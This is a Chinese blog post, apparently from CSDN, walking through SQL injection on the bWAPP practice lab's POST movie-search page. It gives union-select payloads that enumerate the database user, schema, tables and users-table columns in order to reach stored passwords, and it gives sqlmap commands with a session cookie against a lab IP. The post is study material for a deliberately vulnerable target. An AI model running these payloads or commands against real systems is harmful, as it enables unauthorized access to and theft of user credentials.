SQL注入-bWAPP靶场-post

已于 2023-05-11 19:59:04 修改
阅读量219 收藏
点赞数
分类专栏: SQL 文章标签: 数据库
于 2022-12-31 01:56:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62665450/article/details/128501815
版权

目标1:拿到当前登入数据库的用户名,和当前数据库的名称。

前提准备:

1,分析需要函数:

user()和database()

2,分析环境:

  • 请求方式:post
  • 是否有回显:有
  • 判断是否可注入:是(用'号判断)

 3 ,注入方法确定

 union select 1,2,3,4,5,6

问题:

问题:

1,回显数据只显示一条(SQL用limit限制)

SELECT * FROM `movies` WHERE Title='Iron Man' union select 1,user(),3,4,5,6 LIMIT 1;

 思路:

使第一条不返回数据,返回为空。

SELECT * FROM `movies` WHERE Title='' union select 1,user(),database(),4,5,6 LIMIT 1;

Title=''查询不到数据返回为空,所以返回union后的数据

结果: 

目标2:已知数据库的名称,获取数据库中表名

前提准备:

1,分析需要函数:

SELECT * FROM `movies` 
WHERE Title='' 
union 
select 1,user(),database(),table_name,5,6 
from information_schema.tables 
WHERE table_schema=database() LIMIT 1,1;

 Mysql 中 information_schema 数据库中有 tables 表,

 tables表中有所有数据库中表名

问题:

问题

1,回显数据只显示一条(SQL用limit限制)

  无法一次返回所有数据(表名)

解决思路

方法一: 

用limit 0,1    1,1     2,1    3,1

SELECT * FROM `movies` 
WHERE Title='' 
union 
select 1,user(),database(),table_name,5,6 
from information_schema.tables 
WHERE table_schema=database() LIMIT 1,1;

方法二:

用 GROUP_CONCAT(table_name)函数

该函数会返回一个表中一个字段的所有信息

SELECT * FROM `movies` 
WHERE Title='' 
union
select 1,user(),database(),GROUP_CONCAT(table_name),5,6 
from information_schema.tables 
WHERE table_schema=database();

结果: 

 

 

目标2:已知数据库的名称,数据库中表名,获取表中字段

前提准备:

1,分析需要函数:

SELECT * FROM `movies` 
WHERE Title='' 
union 
select 1,user(),database(),GROUP_CONCAT(column_name),5,6 
from information_schema.columns 
WHERE table_name='users';

 Mysql 中 information_schema 数据库中有 columns 表,

 columns表中有所有表中字段名

结果: 

 最终结果:

拿到账号密码

使用sqlmap进行攻击:

1.输出数据库的所有数据库

sqlmap -u "http://192.168.183.131:80/bWAPP/bWAPP/sqli_13.php" --data "movie=1&action=go" --cookie "security_level=0; PHPSESSID=vl8l1udcp7k2qnfkacpnt2qhsc" -dbs

-u                 输入url参数

--data           post注入参数

--cookie        登入cookie

-dbs              输出数据库的所有数据库

 

识别出后端数据库管理系统(DBMS)是MySQL,Web应用程序技术是PHP 8.1.12,Apache版本为2.4.54。SQLMap已经成功地获取了8个可用的数据库名称,包括bwapp,information_schema,mysql,performance_schema,phpmyadmin,tang1,tangzihan和test。

2,查看bwapp数据库中所有表名 

sqlmap -u "http://192.168.183.131:80/bWAPP/bWAPP/sqli_13.php" --data "movie=1&action=go" --cookie "security_level=0; PHPSESSID=vl8l1udcp7k2qnfkacpnt2qhsc" -dbs  -D bwapp --tables

-D bwapp --tables          #查看bwapp数据库中所有表名

 3,查看bwapp数据库users表中数据 

sqlmap -u "http://192.168.183.131:80/bWAPP/bWAPP/sqli_13.php" --data "movie=1&action=go" --cookie "security_level=0; PHPSESSID=vl8l1udcp7k2qnfkacpnt2qhsc" -dbs -D bwapp --tables -T users --columns

-dbs    查询所有数据库

-D      指定数据库

--tables       在- D 指定的数据库下查询表信息

-T users --columns :   查询 -D 指定的数据库中的users表中的字段

 

XiaoBaiOne-1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入靶场实操
m0_46104808的博客
10-27 1537
sql注入漏洞利用
sql注入——pikachu靶场
cjh12340826的博客
07-20 627
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
easy_cloudantivirus靶机之SQL注入、命令注入、NC串联
qq_40898302的博客
04-28 191
端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权。
bwapp靶场post_select
weixin_73331134的博客
04-18 1753
总体思路:database------>tables------->username/password(先拿到数据库再拿到表,最后在表中查字段)总体思路:database------>tables------->username/password(先拿到数据库再拿到表,最后在表中查字段)则我们便可以输入:11 union select 1,user(),database(),4,table_name,6,7 from。然后选择下方的body,选择form-data,再次看我们浏览器中的检查,找到请求。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4608
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sql注入靶场练习
weixin_46976845的博客
03-19 5858
pass.1 发现id注入点,尝试联合注入 id=1’ union select 1,database().3 --+或者 id=1’ union select 1,database().3#’ 返回 Welcome Dhakkan Your Login name:Dumb Your Password:Dumb 跑sqlmap 得知数据库账户密码都为root pass.2 注入与1相同 pass.3 括号闭合 注意 ?id=1’) union select 1,database().3 --+ pa
sql-lap注入靶场
05-02
这个"sql-lap注入靶场"是专门为学习和实践SQL注入漏洞而设计的一个平台。在这个靶场中,你可以模拟黑客攻击,体验如何利用SQL注入来破解系统,同时也能够提升你的安全防护意识和技能。 SQL注入攻击的基本原理是,...
web-报错注入-皮卡丘靶场
07-15
在"皮卡丘靶场"中,我们看到了几种不同的报错注入技巧。 首先,`updatexml()`函数被用来测试和提取数据库信息。`updatexml(1,expression,1)`通常是一个无效的操作,因为第一个参数为1,而XML文档需要一个XML格式的...
sql-bypass靶场
03-19
在"sql-bypass靶场"中,我们面对的是一个带有过滤机制的SQL注入场景,这意味着靶场已经设置了一些防御措施,以防止直接的SQL注入攻击。为了成功利用这个靶场,我们需要了解如何绕过这些过滤机制,这通常涉及到一些...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
【安全测试学习】基于bWAPP靶场,使用sqlmap实现脱库实战
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-24 588
基于bWAPP靶场,使用sqlmap实现脱库实战
portswigger靶场sql注入(三)
wzhwzh123321的博客
01-30 491
回显正常,则列数为2,可以通过select banner from v$version这条语句查询Oracle数据库的版本信息,构造payload如下,成功查询到Oracle数据库的版本信息。Oracle数据库执行select语句时,必须指定一个表名,且Oracle数据库内置一个表dual,则可以通过该表名完成select语句的查询。打开靶场,抓包,使用union select修改列数确定为几列,当列数为1时回显报错。查询这两列的数据,成功查询到用户名为administrator的用户的用户名和密码。
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1244
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1738
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 804
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
bwapp靶场笔记 -SQL注入
m0_52149675的博客
10-30 1553
​启动靶场
bWAPP-sqlmap
hee_mee的博客
01-06 399
zeroNIL
sql注入-pikachu靶场
10-13
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL语句来获取或篡改数据库中的数据。在Pikachu靶场中,可以通过注入恶意的SQL语句来获取管理员账户的密码。具体步骤如下: 1. 在登录页面输入用户名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值